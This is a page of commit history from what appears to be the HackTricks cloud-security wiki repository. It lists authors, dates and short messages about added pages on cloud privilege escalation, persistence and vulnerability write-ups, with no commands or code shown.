Compare commits

..

618 Commits

Author SHA1 Message Date
carlospolop
675092de06 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-10-01 11:37:16 +02:00
carlospolop
570c0f46af fix searchindex 2025-10-01 11:37:13 +02:00
Build master
2468851007 Update searchindex (purged history; keep current) 2025-09-30 22:08:01 +00:00
carlospolop
d0ebc37eb3 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-10-01 00:04:05 +02:00
carlospolop
79fd264473 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-10-01 00:04:05 +02:00
carlospolop
becec234f4 f 2025-09-30 23:46:30 +02:00
carlospolop
143e6bdfe9 f 2025-09-30 23:46:30 +02:00
carlospolop
2a5d2dea9e Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-30 23:45:47 +02:00
carlospolop
9b52c7953d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-30 23:45:47 +02:00
Build master
07628e009a Update searchindex (purged history; keep current) 2025-09-30 19:15:32 +00:00
SirBroccoli
8d39c38b58 Merge pull request #216 from HackTricks-wiki/update_Cooking_an_SQL_Injection_Vulnerability_in_Chef_Aut_20250930_182633
Cooking an SQL Injection Vulnerability in Chef Automate
2025-09-30 21:13:40 +02:00
SirBroccoli
7097f55620 Update SUMMARY.md 2025-09-30 21:13:20 +02:00
SirBroccoli
f96fed548e Merge pull request #215 from JaimePolop/master
Roles Anywhere explanation
2025-09-30 21:11:45 +02:00
HackTricks News Bot
21b31a3be3 Add content from: Cooking an SQL Injection Vulnerability in Chef Automate
- Remove searchindex.js (auto-generated file)
2025-09-30 18:28:35 +00:00
JaimePolop
5d031d4518 Roles Anywhere explanation 2025-09-30 17:50:02 +02:00
SirBroccoli
1e51bb702d Merge pull request #210 from HackTricks-wiki/update_Forgotten_20250917_063108
Forgotten
2025-09-30 01:24:53 +02:00
SirBroccoli
1111212cbb Update attacking-kubernetes-from-inside-a-pod.md 2025-09-30 01:07:36 +02:00
SirBroccoli
bb763109dc Merge pull request #209 from HackTricks-wiki/update_GitHub_Actions__A_Cloudy_Day_for_Security_-_Part_2_20250915_124429
GitHub Actions A Cloudy Day for Security - Part 2
2025-09-30 01:05:33 +02:00
SirBroccoli
25af34d5a2 Merge pull request #208 from HackTricks-wiki/update_Building_Hacker_Communities__Bug_Bounty_Village__g_20250915_123837
Building Hacker Communities Bug Bounty Village, getDisclosed...
2025-09-30 00:57:56 +02:00
carlospolop
a10148e331 f 2025-09-30 00:54:25 +02:00
carlospolop
b904273a19 f 2025-09-30 00:54:25 +02:00
carlospolop
0aa87b8319 f 2025-09-30 00:53:25 +02:00
carlospolop
004e341804 f 2025-09-30 00:53:25 +02:00
Build master
24c1d54861 Update searchindex (purged history; keep current) 2025-09-29 22:46:56 +00:00
carlospolop
015b24f51c Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-30 00:40:54 +02:00
carlospolop
8589cf621f Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-30 00:40:54 +02:00
carlospolop
c8957b9107 f 2025-09-30 00:39:12 +02:00
carlospolop
ecebe97de5 f 2025-09-30 00:39:12 +02:00
Build master
fe691c5c50 Update searchindex (purged history; keep current) 2025-09-29 22:31:25 +00:00
SirBroccoli
de064b1b68 Merge pull request #214 from JaimePolop/master
GetFederatedToken & IAM Roles Anywhere Privesc
2025-09-30 00:23:32 +02:00
SirBroccoli
ea0f667e57 Merge pull request #214 from JaimePolop/master
GetFederatedToken & IAM Roles Anywhere Privesc
2025-09-30 00:23:32 +02:00
SirBroccoli
b7a1554deb Delete searchindex.js 2025-09-30 00:23:17 +02:00
Build master
1304799271 Update searchindex (purged history; keep current) 2025-09-29 21:35:54 +00:00
carlospolop
18e756320d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-29 23:30:37 +02:00
SirBroccoli
78767e199c Merge pull request #207 from HackTricks-wiki/update_GitHub_Actions__A_Cloudy_Day_for_Security_-_Part_1_20250909_013245
GitHub Actions A Cloudy Day for Security - Part 1
2025-09-29 23:05:37 +02:00
SirBroccoli
65816a9798 Merge pull request #206 from HackTricks-wiki/update_Model_Namespace_Reuse__An_AI_Supply-Chain_Attack_E_20250904_125657
Model Namespace Reuse An AI Supply-Chain Attack Exploiting M...
2025-09-29 23:04:02 +02:00
SirBroccoli
fc5e23269c Update pentesting-cloud-methodology.md 2025-09-29 23:03:41 +02:00
SirBroccoli
89a2ab54ae Update pentesting-cloud-methodology.md 2025-09-29 23:03:04 +02:00
JaimePolop
f3afa739ad Roles Anywhere explanation 2025-09-29 22:53:29 +02:00
JaimePolop
d11f3a3880 Roles Anywhere explanation 2025-09-29 22:53:29 +02:00
JaimePolop
590e54ea9e stsgetfederatedtoken 2025-09-29 17:15:59 +02:00
JaimePolop
f539a9e2d9 stsgetfederatedtoken 2025-09-29 17:15:59 +02:00
JaimePolop
e153dc47b0 stsgetfederatedtoken 2025-09-29 17:14:00 +02:00
JaimePolop
9242d2e4d9 stsgetfederatedtoken 2025-09-29 17:14:00 +02:00
HackTricks News Bot
37b03b3517 Add content from: Forgotten
- Remove searchindex.js (auto-generated file)
2025-09-17 06:34:24 +00:00
HackTricks News Bot
a6491998d2 Add content from: GitHub Actions: A Cloudy Day for Security - Part 2
- Remove searchindex.js (auto-generated file)
2025-09-15 12:47:04 +00:00
HackTricks News Bot
dba44c006e Add content from: Building Hacker Communities: Bug Bounty Village, getDisclose...
- Remove searchindex.js (auto-generated file)
2025-09-15 12:43:09 +00:00
HackTricks News Bot
b9b20e4567 Add content from: GitHub Actions: A Cloudy Day for Security - Part 1
- Remove searchindex.js (auto-generated file)
2025-09-09 01:35:49 +00:00
Build master
391b11e92c Update searchindex (purged history; keep current) 2025-09-05 10:54:39 +00:00
carlospolop
19024e5a7c f 2025-09-05 12:50:45 +02:00
carlospolop
4d9445d2bb f 2025-09-05 12:49:02 +02:00
carlospolop
7f435558c4 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-09-05 01:35:13 +02:00
carlospolop
a7ce58fa25 tf 2025-09-05 01:34:02 +02:00
HackTricks News Bot
5b5e339f96 Add content from: Model Namespace Reuse: An AI Supply-Chain Attack Exploiting ...
- Remove searchindex.js (auto-generated file)
2025-09-04 13:00:46 +00:00
SirBroccoli
5bd2aafc8e Merge pull request #204 from HackTricks-wiki/update_Gitblit_CVE-2024-28080__SSH_public_key_fallback_to_20250829_182811
Gitblit CVE-2024-28080 SSH public‑key fallback to password a...
2025-08-31 10:17:05 +02:00
SirBroccoli
00730ca794 Add Gitblit Security section to SUMMARY.md 2025-08-31 10:16:44 +02:00
SirBroccoli
923f510164 Refactor pentesting CI/CD methodology document
Removed redundant sections on CI/CD pipelines and VCS pentesting methodology. Updated references and streamlined content for clarity.
2025-08-31 10:15:04 +02:00
SirBroccoli
fec9bfb986 Update pentesting-ci-cd-methodology.md 2025-08-31 10:12:16 +02:00
SirBroccoli
6a11053885 Remove CVE-2024-28080 details from documentation
Removed detailed explanation of CVE-2024-28080, including summary, root cause, exploitation steps, impact, detection ideas, and mitigations.
2025-08-31 10:11:39 +02:00
SirBroccoli
de46109976 Merge pull request #205 from Fake1Sback/ecs-run-task-privesc-details
ecs run-task privesc method as a separate section
2025-08-31 10:06:39 +02:00
SirBroccoli
fd19dc2304 Update aws-ecs-privesc.md 2025-08-31 10:06:24 +02:00
Fake1Sback
599d45c50a Added a separate section about the ecs run-task privesc method, since it was only briefly mentioned in the iam:PassRole, (ecs:UpdateService|ecs:CreateService) section 2025-08-30 18:52:59 +03:00
HackTricks News Bot
5b2a228050 Add content from: Gitblit CVE-2024-28080: SSH public‑key fallback to password ...
- Remove searchindex.js (auto-generated file)
2025-08-29 18:31:33 +00:00
carlospolop
d1f95b1929 a 2025-08-29 12:01:44 +02:00
carlospolop
846ad61b73 f 2025-08-29 12:01:07 +02:00
carlospolop
c09016a56f Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-29 11:47:04 +02:00
carlospolop
77b76bfb00 a 2025-08-29 11:45:00 +02:00
carlospolop
3883d1a74e clean 2025-08-29 11:42:28 +02:00
carlospolop
ebb51f81bb f 2025-08-29 10:31:31 +02:00
carlospolop
d761716a28 f 2025-08-28 19:51:53 +02:00
carlospolop
467491e1ae f 2025-08-26 11:30:37 +02:00
carlospolop
d05d94d995 f 2025-08-25 23:20:13 +02:00
carlospolop
bc1201eb61 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-24 13:22:13 +02:00
carlospolop
15ff9a7d1c f 2025-08-24 13:22:10 +02:00
SirBroccoli
4880cb4574 Update translator.py 2025-08-22 18:06:33 +02:00
SirBroccoli
05853fcc19 Update translator.py 2025-08-22 12:10:49 +02:00
carlospolop
a45973b8a7 f 2025-08-21 02:29:00 +02:00
carlospolop
38dae42b81 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 02:26:30 +02:00
carlospolop
5adcd244f6 f 2025-08-21 02:26:27 +02:00
SirBroccoli
33ca677b86 Update README.md 2025-08-21 02:19:10 +02:00
carlospolop
b1af5ce692 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 02:18:41 +02:00
carlospolop
61ae9f83db f 2025-08-21 02:18:38 +02:00
SirBroccoli
07a16af4ec Update README.md 2025-08-21 02:12:04 +02:00
carlospolop
f45429555e Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 02:11:47 +02:00
carlospolop
f92d67cfdc f 2025-08-21 02:11:44 +02:00
SirBroccoli
d7c57cba6e Update accessible-deleted-data-in-github.md 2025-08-21 02:05:51 +02:00
SirBroccoli
a641fcea8a Update README.md 2025-08-21 02:05:31 +02:00
SirBroccoli
eb4f46f714 Update README.md 2025-08-21 02:05:02 +02:00
SirBroccoli
1ceeca1326 Update README.md 2025-08-21 02:04:37 +02:00
carlospolop
68267218a7 f 2025-08-21 02:04:24 +02:00
carlospolop
3901748f3d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 02:03:39 +02:00
carlospolop
68de9f8acc f 2025-08-21 02:03:37 +02:00
SirBroccoli
236a8a2cec Update README.md 2025-08-21 01:59:20 +02:00
carlospolop
d373f62166 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 01:59:00 +02:00
carlospolop
c2c232fd46 f 2025-08-21 01:58:58 +02:00
SirBroccoli
f3fd4b9294 Update README.md 2025-08-21 01:56:10 +02:00
SirBroccoli
dd2c5af442 Merge pull request #198 from HackTricks-wiki/update_How_we_exploited_CodeRabbit__from_a_simple_PR_to_R_20250819_183743
How we exploited CodeRabbit from a simple PR to RCE and writ...
2025-08-21 01:52:41 +02:00
carlospolop
ee4da87049 improve workflows 2025-08-21 01:51:45 +02:00
carlospolop
3b1f434a66 f 2025-08-21 01:07:22 +02:00
carlospolop
8db7266efb f 2025-08-21 00:40:51 +02:00
carlospolop
59437b9b32 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-21 00:23:53 +02:00
carlospolop
ea3041d9a2 fix refs 2025-08-21 00:23:50 +02:00
HackTricks News Bot
f171d1a97d Add content from: How we exploited CodeRabbit: from a simple PR to RCE and wri... 2025-08-19 18:40:49 +00:00
SirBroccoli
855ef5fd9e Merge pull request #197 from HackTricks-wiki/update_Terraform_Cloud_token_abuse_turns_speculative_plan_20250815_124146
Terraform Cloud token abuse turns speculative plan into remo...
2025-08-19 17:22:17 +02:00
SirBroccoli
3ff0c8a86f Update terraform-security.md 2025-08-19 17:22:04 +02:00
carlospolop
414eeda035 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-18 16:51:47 +02:00
carlospolop
dac7b0f906 fix? 2025-08-18 16:51:43 +02:00
SirBroccoli
3b456ebc2e Merge pull request #195 from HackTricks-wiki/update_How_to_transfer_files_in_AWS_using_SSM_20250806_013457
How to transfer files in AWS using SSM
2025-08-18 16:48:47 +02:00
SirBroccoli
f0df70528a Update README.md 2025-08-18 16:48:30 +02:00
SirBroccoli
f705477774 Merge pull request #193 from hasshido/master
grte-mightocho
2025-08-18 16:37:29 +02:00
carlospolop
aff8ab0252 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-08-18 16:36:42 +02:00
carlospolop
06b577d42f f 2025-08-18 16:36:38 +02:00
SirBroccoli
14e986b2a7 Merge pull request #196 from lambdasawa/master
grte-lambdasawa
2025-08-18 16:06:12 +02:00
SirBroccoli
581f09f904 Merge pull request #194 from afaq1337/patch-1
arte-afaq
2025-08-18 16:05:08 +02:00
HackTricks News Bot
c76cc24a59 Add content from: Terraform Cloud token abuse turns speculative plan into remo... 2025-08-15 12:46:29 +00:00
Tsubasa Irisawa
15bde67918 Add GCP Cloud Tasks privesc page 2025-08-14 23:47:19 +09:00
HackTricks News Bot
3f16d3c5f3 Add content from: How to transfer files in AWS using SSM 2025-08-06 01:38:30 +00:00
afaq
82a44ea4c0 Updated Cognito Identity CLI Command Format
Replaced the outdated key=value syntax with the JSON-based syntax in the "--logins" format, keeping the old format documented for legacy use.
2025-08-04 23:56:55 +05:00
hasshido
839f139795 Merge branch 'HackTricks-wiki:master' into master 2025-08-04 12:41:01 +02:00
carlospolop
b82a88252c f 2025-08-04 11:37:34 +02:00
carlospolop
c3cfb95b87 f 2025-08-04 11:29:20 +02:00
carlospolop
e0b92e3b7a f 2025-08-01 12:04:42 +02:00
SirBroccoli
f521c0d95a Merge pull request #192 from HackTricks-wiki/update_AnsibleHound___BloodHound_Collector_for_Ansible_Wo_20250801_015104
AnsibleHound – BloodHound Collector for Ansible WorX and Tow...
2025-08-01 11:55:14 +02:00
SirBroccoli
96b0de9ec9 Update kubernetes-basics.md 2025-08-01 11:53:55 +02:00
SirBroccoli
6b96bae348 Update README.md 2025-08-01 11:53:20 +02:00
SirBroccoli
5fd9ed5048 Update gcp-add-custom-ssh-metadata.md 2025-08-01 11:52:52 +02:00
SirBroccoli
3157069bde Update az-static-web-apps.md 2025-08-01 11:51:49 +02:00
SirBroccoli
ccd50a451d Update eventbridgescheduler-enum.md 2025-08-01 11:50:45 +02:00
SirBroccoli
0a1f3dea22 Update aws-ecr-enum.md 2025-08-01 11:50:28 +02:00
SirBroccoli
e1bc13c19c Update aws-waf-enum.md 2025-08-01 11:49:21 +02:00
SirBroccoli
58c7ae8399 Update aws-trusted-advisor-enum.md 2025-08-01 11:49:00 +02:00
SirBroccoli
0ba0d247a8 Update aws-inspector-enum.md 2025-08-01 11:48:43 +02:00
SirBroccoli
6f8738f34f Update aws-sagemaker-persistence.md 2025-08-01 11:47:18 +02:00
SirBroccoli
5a6cd9a85c Merge pull request #191 from lambdasawa/master
arte-lambdasawa
2025-08-01 11:43:36 +02:00
HackTricks News Bot
ed2ae1e58f Add content from: AnsibleHound – BloodHound Collector for Ansible WorX and Tow... 2025-08-01 01:52:00 +00:00
Tsubasa Irisawa
dbe2969386 Add AWS AppRunner privesc page 2025-08-01 10:09:11 +09:00
carlospolop
97759b6cec rm discount 2025-07-31 11:58:39 +02:00
hasshido
95f380db6b Update gcp-cloudbuild-privesc.md removing cloudbuild.builds.update
### `cloudbuild.builds.update`

Currently this permission is documented to grant access **only** to the API method `builds.cancel()`, which cannot be abused to change the parameters of an ongoing build

References:
- https://cloud.google.com/build/docs/iam-roles-permissions#permissions
- https://cloud.google.com/build/docs/api/reference/rest/v1/projects.builds/cancel
2025-07-30 21:13:32 +02:00
hasshido
65da889db0 Update cloudbuild.builds.create exploitation method
Includes a direct gcloud command description to exploit this permission.
2025-07-30 21:00:52 +02:00
carlospolop
45a7b74a0f f 2025-07-30 12:39:44 +02:00
carlospolop
4d2fa75b55 f 2025-07-30 06:52:07 +02:00
carlospolop
84bc28f8bb f 2025-07-30 06:48:21 +02:00
carlospolop
ebd15ccb63 f 2025-07-30 06:27:12 +02:00
carlospolop
f72768b30f fix 2025-07-30 06:18:20 +02:00
carlospolop
7a92891381 fix 2025-07-30 06:14:13 +02:00
carlospolop
e98c16371b fix 2025-07-30 06:05:19 +02:00
carlospolop
b1b0b0c536 impr 2025-07-30 05:57:20 +02:00
carlospolop
e324b93d88 improvements 2025-07-29 17:56:43 +02:00
carlospolop
baff049eb8 improvements 2025-07-24 13:23:56 +02:00
carlospolop
46a8364006 ssm 2025-07-24 08:53:00 +02:00
SirBroccoli
ce9f3f87af Merge pull request #190 from vishnuraju/master
arte-dh4wk
2025-07-24 08:48:14 +02:00
carlospolop
8655bc665f improvements 2025-07-24 00:04:54 +02:00
carlospolop
26022c0005 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-07-22 20:58:28 +02:00
carlospolop
a315ad9465 update 2025-07-22 20:58:25 +02:00
SirBroccoli
26d6010bfd Merge pull request #189 from AI-redteam/sagemaker_persistence
arte-bstevens
2025-07-22 14:26:58 +02:00
vishnuraju
d613dc8ce7 adding create-association for persistence 2025-07-19 15:56:47 +05:30
carlospolop
e93215546e impr 2025-07-18 14:59:34 +02:00
carlospolop
b4bb813717 improve translator 2025-07-18 14:59:11 +02:00
carlospolop
ab12e74c5e Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-07-16 15:45:31 +02:00
carlospolop
55658adf68 atlantis 2025-07-16 15:45:27 +02:00
SirBroccoli
e10e318840 Update ai.js 2025-07-16 11:23:46 +02:00
Ben
3662845c9c Update aws-sagemaker-persistence.md 2025-07-15 17:07:58 -05:00
Ben
7b475f151e Update aws-sagemaker-persistence.md 2025-07-15 17:01:04 -05:00
Ben
cfacf65682 Create aws-sagemaker-persistence.md 2025-07-15 16:46:25 -05:00
carlospolop
cacc26efe4 d 2025-07-15 19:22:04 +02:00
carlospolop
3f6485403c f 2025-07-12 16:21:38 +02:00
carlospolop
ec63e0077a Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-07-07 11:50:03 +02:00
carlospolop
8197352f5b f 2025-07-07 11:49:58 +02:00
SirBroccoli
e75ef47d73 Merge pull request #186 from JaimePolop/patch-24
Update aws-kms-enum.md
2025-07-03 16:51:47 +02:00
Jaime Polop
4c5a2d0b51 Update aws-kms-enum.md 2025-06-27 18:37:04 +02:00
carlospolop
f26eba3574 f 2025-06-25 13:54:52 +02:00
carlospolop
e1a1b2a31f f 2025-06-25 02:19:23 +02:00
carlospolop
d21b704799 a 2025-06-25 01:52:06 +02:00
carlospolop
278e22cf25 UPDATE 2025-06-24 15:59:59 +02:00
SirBroccoli
ba62c1ded8 Merge pull request #183 from sebastian-mora/add-roles-anywhere-privesc
Adding page for IAM Roles Anywhere Privesc
2025-06-24 15:58:25 +02:00
carlospolop
e6af835b2d a 2025-06-24 10:23:30 +02:00
carlospolop
c3110e5dc2 f 2025-06-22 14:53:27 +02:00
carlospolop
c3d732d46b f 2025-06-13 16:19:46 +02:00
carlospolop
16833c8621 a 2025-06-10 14:41:34 +02:00
carlospolop
e004aa173d Check origin GCP project 2025-06-10 14:33:27 +02:00
carlospolop
32d8b32e1f fix 2025-06-08 19:59:16 +02:00
carlospolop
8cb8cf4b78 a 2025-06-07 15:08:20 +02:00
carlospolop
682420bd96 a 2025-05-28 23:34:48 +02:00
carlospolop
423b2f5d24 f name insta 2025-05-20 17:38:13 +02:00
carlospolop
06302efcc4 f 2025-05-20 17:31:11 +02:00
carlospolop
12f8a8240c fix actions 2025-05-20 17:30:59 +02:00
carlospolop
cc8c3b9bc7 f 2025-05-20 17:16:28 +02:00
carlospolop
e3be82da7b a 2025-05-20 08:02:42 +02:00
carlospolop
5c9151d0a9 f 2025-05-20 07:44:49 +02:00
carlospolop
4f8f9ebb5d delepwn 2025-05-17 06:58:24 +02:00
carlospolop
a59586d035 a 2025-05-15 18:55:14 +02:00
carlospolop
6f5f13f1d1 a 2025-05-14 23:46:42 +02:00
carlospolop
d0a10b4b59 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-05-14 15:49:44 +02:00
carlospolop
3153e9e112 a 2025-05-14 15:49:14 +02:00
seb
4ba5101450 add blog 2025-05-12 23:33:37 -04:00
Ignacio Dominguez
46317efe3f Update az-cloud-shell-persistence.md 2025-05-12 21:23:45 +02:00
carlospolop
13cd85219b a 2025-05-11 17:04:02 +02:00
Carlos Polop
bb4337235e a 2025-05-09 14:53:58 +02:00
Carlos Polop
4adabb8e45 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-05-09 14:41:10 +02:00
Carlos Polop
64e6b18369 clarification 2025-05-09 14:41:08 +02:00
SirBroccoli
e79a494c75 Merge pull request #180 from MickaelFontes/master
fix: wrong reference link in s3 privesc
2025-05-09 13:45:44 +02:00
SirBroccoli
e8310823ee Merge pull request #182 from reubensammut/master
Update az-automation-accounts-privesc.md
2025-05-09 13:43:18 +02:00
Carlos Polop
94d6bb7be6 apps username 2025-05-09 13:14:54 +02:00
Carlos Polop
3886eb0679 update searcher 2025-05-08 23:14:04 +02:00
Carlos Polop
b4a33ce277 last 2025-05-08 23:10:34 +02:00
Reuben Sammut
b206e184f6 Merge pull request #1 from reubensammut/change-webhook-command
Update az-automation-accounts-privesc.md
2025-05-08 21:35:21 +02:00
Reuben Sammut
1562438890 Update az-automation-accounts-privesc.md
Change the webhook command to use the PowerShell cmdlet `New-AzAutomationWebHook`, which automatically generates the URI; the command previously used here relied on a URI generated by the Azure Portal
2025-05-08 21:26:25 +02:00
Carlos Polop
9c7ae3465b a 2025-05-05 23:42:52 +02:00
Carlos Polop
afef551baa fix 2025-05-01 16:25:15 +02:00
MickaelFontes
45f06743a5 fix: wrong reference link in s3 privesc 2025-05-01 12:07:35 +00:00
Carlos Polop
2cf7ab9070 a 2025-05-01 13:52:01 +02:00
Carlos Polop
a67f9f67e9 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-05-01 13:35:45 +02:00
Carlos Polop
b76f4ee32e improvements 2025-05-01 13:35:42 +02:00
SirBroccoli
c57b961d3f Merge pull request #179 from olizimmermann/patch-1
Update aws-s3-unauthenticated-enum.md
2025-04-30 17:29:53 +02:00
SirBroccoli
6a65d520db Merge pull request #178 from courtneyimbert/fix/arte-courtneybell-corrections
arte-courtneybell
2025-04-30 17:28:34 +02:00
Carlos Polop
2d8e6cc317 ai improvements 2025-04-29 10:27:14 +02:00
Carlos Polop
1af7a95753 a 2025-04-28 01:14:18 +02:00
Carlos Polop
81bd25041e typo 2025-04-27 23:46:36 +02:00
Carlos Polop
a2fc1bb9e4 add 2025-04-27 23:34:53 +02:00
Carlos Polop
245801a8f3 a 2025-04-26 13:09:32 +02:00
Carlos Polop
c8ee4e1f63 don't freeze because of searcher 2025-04-26 13:05:26 +02:00
Carlos Polop
87d7a35977 a 2025-04-25 17:53:18 +02:00
Carlos Polop
df415302d4 hacktricks ai 2025-04-25 17:49:40 +02:00
Carlos Polop
227bd60d9d fix postgresql 2025-04-25 04:50:59 +02:00
Oliver Zimmermann
6113778d42 Update aws-s3-unauthenticated-enum.md 2025-04-22 13:57:01 +02:00
Carlos Polop
6229cc5c3f f 2025-04-21 23:00:32 +02:00
Carlos Polop
cc3464f588 fix search 2025-04-21 02:09:17 +02:00
Carlos Polop
84c84de0f6 fix 2025-04-21 01:57:47 +02:00
Carlos Polop
1af5f28379 fix search 2025-04-21 00:17:58 +02:00
Carlos Polop
d22733b802 rm searhcindex.json 2025-04-21 00:14:09 +02:00
Carlos Polop
13e0bddd0c fix local 2025-04-20 02:55:39 +02:00
Courtney Bell
2f1397e2df arte-courtneybell
Added webhook alternative example (tested) to task definition as a new tab
2025-04-19 19:21:52 -04:00
Courtney Bell
a1718ef3d5 arte-courtneybell-corrections
Minor fixes (one command corrected based on testing, 2 typo corrections)
2025-04-19 18:38:14 -04:00
Carlos Polop
c01bb34d34 f 2025-04-18 13:46:59 +02:00
Carlos Polop
57d0f100e5 v 2025-04-18 13:21:17 +02:00
Carlos Polop
9e731ee081 f 2025-04-16 17:36:49 +02:00
Carlos Polop
f37c444854 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-04-15 01:44:12 +02:00
Carlos Polop
cb0f15bd18 use langs locally 2025-04-15 01:44:09 +02:00
SirBroccoli
05ef9e4e88 Update translator.py 2025-04-15 00:06:14 +02:00
SirBroccoli
653f16bf02 Update translator.py 2025-04-15 00:04:20 +02:00
Carlos Polop
02f3d3d27e add 2025-04-14 23:56:48 +02:00
Carlos Polop
fd7e52a9f0 Update banners 2025-04-14 23:56:08 +02:00
Carlos Polop
a31a609a53 gif 2025-04-14 23:44:49 +02:00
Carlos Polop
2d20c080f1 im 2025-04-13 16:30:15 +02:00
Carlos Polop
a1abf4a40e book 2025-04-13 16:29:58 +02:00
Carlos Polop
3267900f8e action 2025-04-13 16:29:23 +02:00
Carlos Polop
d24b4f4947 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-04-11 02:23:56 +02:00
Carlos Polop
cb93bc9325 a 2025-04-11 02:23:53 +02:00
SirBroccoli
89bd5603b5 Merge pull request #177 from TheToddLuci0/add_cdk
arte-TheToddLuci0
2025-04-07 03:06:15 +02:00
SirBroccoli
a214e36c16 Merge pull request #175 from TheToddLuci0/add_credential_process
Add `credential_process` info
2025-04-07 03:04:24 +02:00
TheToddLuci0
46fb09dbc7 Add info on CDK 2025-04-03 15:31:19 -05:00
SirBroccoli
c6c5326731 Merge pull request #174 from TheToddLuci0/add_lambda_credential_theft
Add section on lambda credential theft
2025-04-03 22:29:19 +02:00
Carlos Polop
0d99994b28 t 2025-04-03 22:28:06 +02:00
SirBroccoli
518ec63594 Merge pull request #173 from 0x21AD/master
Mindmap PE Common Services
2025-04-03 15:45:50 +02:00
Build master
365ec0ea1b Update searchindex 2025-04-02 15:51:23 +00:00
SirBroccoli
55bb9cabcd Merge pull request #176 from JaimePolop/master
changes
2025-04-02 17:49:38 +02:00
Jimmy
b63860c1b3 changes 2025-04-01 00:12:16 +02:00
Jaime Polop
f396d310ed Merge branch 'HackTricks-wiki:master' into master 2025-03-31 23:26:23 +02:00
TheToddLuci0
fb64ce166d Add instructions for automating temp creds with external process 2025-03-31 14:14:00 -05:00
TheToddLuci0
60fe5b65e9 Add a dedicated post-exploitation section on stealing creds from lambda 2025-03-31 13:49:12 -05:00
SirBroccoli
d6a90112e4 Update upload_ht_to_ai.py 2025-03-31 04:39:18 +02:00
SirBroccoli
8ac043f850 Update upload_ht_to_ai.yml 2025-03-31 04:38:40 +02:00
SirBroccoli
d0ca3b4c13 Update upload_ht_to_ai.py 2025-03-31 04:36:29 +02:00
SirBroccoli
0721cb17a8 Update upload_ht_to_ai.yml 2025-03-31 04:34:21 +02:00
SirBroccoli
0a7aa1d734 Update upload_ht_to_ai.yml 2025-03-31 04:32:23 +02:00
SirBroccoli
f976ae1b70 Update upload_ht_to_ai.yml 2025-03-31 04:30:53 +02:00
SirBroccoli
73895ccc90 Update upload_ht_to_ai.py 2025-03-31 04:30:08 +02:00
SirBroccoli
a0c66139cf Create upload_ht_to_ai.yml 2025-03-31 04:27:09 +02:00
SirBroccoli
6d3e83b6fa Update and rename clean_for_ai.py to upload_ht_to_ai.py 2025-03-31 04:23:34 +02:00
Build master
323213ba74 Update searchindex 2025-03-29 23:01:11 +00:00
Carlos Polop
f87ea41409 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-29 23:55:08 +01:00
Carlos Polop
fa3baebd58 impr 2025-03-29 23:54:50 +01:00
0x21AD
ecb7b8f136 Mindmap PE Common Services 2025-03-29 14:14:44 +02:00
Build master
64bb51ab33 Update searchindex 2025-03-29 08:43:50 +00:00
Carlos Polop
043f28492d Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-29 09:42:05 +01:00
Carlos Polop
7136d61e6b f 2025-03-29 09:42:02 +01:00
Build master
aa4d2f583f Update searchindex 2025-03-28 15:53:20 +00:00
Carlos Polop
5276c9c7db Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-28 16:51:43 +01:00
Carlos Polop
005dee76e9 more 2025-03-28 16:51:40 +01:00
Build master
954173982d Update searchindex 2025-03-28 11:25:08 +00:00
Carlos Polop
014036afb7 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-28 12:23:25 +01:00
Carlos Polop
ff9846dbc6 a 2025-03-28 12:23:23 +01:00
Build master
5c6a20ff62 Update searchindex 2025-03-28 10:46:54 +00:00
Carlos Polop
524edcbc09 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-28 11:45:18 +01:00
Carlos Polop
8be8f721ca add 2025-03-28 11:45:16 +01:00
Build master
d7937f5851 Update searchindex 2025-03-27 12:44:53 +00:00
SirBroccoli
8cca683281 Merge pull request #172 from kluo84/arte-mr.kluo-UpdateStateMachine
arte-Kluo
2025-03-27 13:43:24 +01:00
kluo
29db46c537 Update aws-stepfunctions-post-exploitation.md 2025-03-26 18:11:05 -05:00
kluo84
35075688aa arte-mr.kluo-UpdateStateMachine 2025-03-26 18:04:29 -05:00
kluo84
49023a7e71 Update more post exploitation for step function 2025-03-24 20:29:40 -05:00
Jaime Polop
ec902048e6 Merge branch 'HackTricks-wiki:master' into master 2025-03-21 11:18:56 +01:00
Carlos Polop
413635f6ed a 2025-03-21 10:26:04 +01:00
Carlos Polop
160cdf0767 Merge branch 'master' of github.com:HackTricks-wiki/hacktricks-cloud 2025-03-21 10:20:07 +01:00
Carlos Polop
ce9d8e9162 f 2025-03-21 10:17:18 +01:00
Build master
27bda8c014 Update searchindex 2025-03-21 09:09:36 +00:00
Build master
